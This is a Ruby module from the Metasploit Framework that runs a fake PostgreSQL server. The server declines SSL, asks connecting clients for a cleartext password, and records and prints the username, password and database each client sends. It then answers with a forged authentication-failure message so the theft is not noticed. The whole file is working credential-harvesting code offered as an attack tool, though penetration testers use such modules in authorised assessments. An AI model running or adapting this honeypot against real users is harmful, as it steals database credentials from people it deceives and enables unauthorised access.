metasploit-framework/modules/auxiliary/server/capture/postgresql.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::TcpServer
	include Msf::Auxiliary::Report

	def initialize
		super(
			'Name'           => 'Authentication Capture: PostgreSQL',
			'Version'        => '$Revision$',
			'Description'    => %q{
				This module provides a fake PostgreSQL service that is designed to
				capture clear-text authentication credentials.},
			'Author'         => 'Dhiru Kholia <dhiru at openwall.com>',
			'License'        => MSF_LICENSE,
			'Actions'        => [ [ 'Capture' ] ],
			'PassiveActions' => [ 'Capture' ],
			'DefaultAction'  => 'Capture'
		)

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The local port to listen on.", 5432 ]),
			], self.class)
	end

	# This module is based on MySQL capture module by Patrik Karlsson.
	# Reference: http://www.postgresql.org/docs/9.2/static/protocol-message-formats.html

	def setup
		super
		@state = {}
	end

	def run
		print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
		exploit()
	end

	def on_client_connect(c)
		@state[c] = {
			:name    => "#{c.peerhost}:#{c.peerport}",
			:ip      => c.peerhost,
			:port    => c.peerport,
		}
		@state[c]["status"] = :init
	end

	def on_client_data(c)
		data = c.get_once
		return if not data
		length = data.slice(0, 4).unpack("N")[0]
		if length == 8 and @state[c]["status"] == :init
			# SSL request
			c.put 'N'
			@state[c]["status"] = :send_auth_type
		elsif @state[c]["status"] == :send_auth_type
			# Startup message
			length = data.slice!(0, 4).unpack("N")[0]
			protocol = data.slice!(0, 4).unpack("N")[0]
			sdata = [ 0x52, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03 ].pack("CCCCCCCCC")
			c.put sdata
			data.slice!(0, 5) # skip over "user\x00"
			@state[c][:username] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
			data.slice!(0, 9) # skip over "database\x00"
			@state[c][:database] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
			@state[c]["status"] = :pwn
		elsif @state[c]["status"] == :pwn and data[0] == 'p'
			# Password message
			length = data.slice!(0, 5).unpack("N")[0]
			@state[c][:password] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
			report_auth_info(
				:host  => c.peerhost,
				:port => datastore['SRVPORT'],
				:sname => 'psql',
				:user => @state[c][:username],
				:pass => @state[c][:password],
				:type => "PostgreSQL credentials",
				:proof => @state[c][:database],
				:source_type => "captured",
				:active => true
			)
			print_status("PostgreSQL LOGIN #{@state[c][:name]} #{@state[c][:username]} / #{@state[c][:password]} / #{@state[c][:database]}")
			# send failure message, currently the failing username is always "postgres"
			# TODO: make failing username dynamic!
			sdata = [
				0x45, 0x00, 0x00, 0x00, 0x61, 0x53, 0x46, 0x41,
				0x54, 0x41, 0x4c, 0x00, 0x43, 0x32, 0x38, 0x50,
				0x30, 0x31, 0x00, 0x4d, 0x70, 0x61, 0x73, 0x73,
				0x77, 0x6f, 0x72, 0x64, 0x20, 0x61, 0x75, 0x74,
				0x68, 0x65, 0x6e, 0x74, 0x69, 0x63, 0x61, 0x74,
				0x69, 0x6f, 0x6e, 0x20, 0x66, 0x61, 0x69, 0x6c,
				0x65, 0x64, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x75,
				0x73, 0x65, 0x72, 0x20, 0x22, 0x70, 0x6f, 0x73,
				0x74, 0x67, 0x72, 0x65, 0x73, 0x22, 0x00, 0x46,
				0x61, 0x75, 0x74, 0x68, 0x2e, 0x63, 0x00, 0x4c,
				0x33, 0x30, 0x32, 0x00, 0x52, 0x61, 0x75, 0x74,
				0x68, 0x5f, 0x66, 0x61, 0x69, 0x6c, 0x65, 0x64,
				0x00, 0x00].pack("C" * 98)
			c.put sdata
			c.close
		end

	end

	def on_client_close(c)
		@state.delete(c)
	end
end